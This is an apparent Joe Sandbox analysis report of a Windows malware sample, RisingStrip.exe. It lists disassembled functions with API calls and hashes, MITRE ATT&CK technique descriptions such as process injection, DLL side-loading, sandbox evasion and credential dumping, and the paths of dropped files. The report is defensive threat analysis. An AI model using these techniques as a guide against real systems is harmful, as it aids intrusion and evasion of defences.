Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D

Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00402100
GetDeviceCaps.GDI32(00000000), ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
Opcode Fuzzy Hash: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D

Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
lstrcpynW.KERNEL32(?,?,?), ref: 00407261

Strings

Version , xrefs: 00407241

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC

Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
GetProcAddress.KERNEL32(?,00000000), ref: 00406395
GlobalFree.KERNEL32(00000000), ref: 0040639E

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675

Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718

Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
CloseHandle.KERNEL32(?), ref: 00405C71

Strings

Error launching installer, xrefs: 00405C48

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68

Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062A5, 004062AA

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E

Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report RisingStrip.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\y5xtj\1nym7g

C:\ProgramData\y5xtj\7q16x4790

C:\ProgramData\y5xtj\8ym7yus0z

C:\ProgramData\y5xtj\ba1dj5

C:\ProgramData\y5xtj\f379r9

C:\ProgramData\y5xtj\im7gdj

C:\ProgramData\y5xtj\phlnoh

C:\ProgramData\y5xtj\qq16fu

C:\ProgramData\y5xtj\rq9hd2

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\q

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Advances

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Am

Windows Analysis Report
RisingStrip.exe

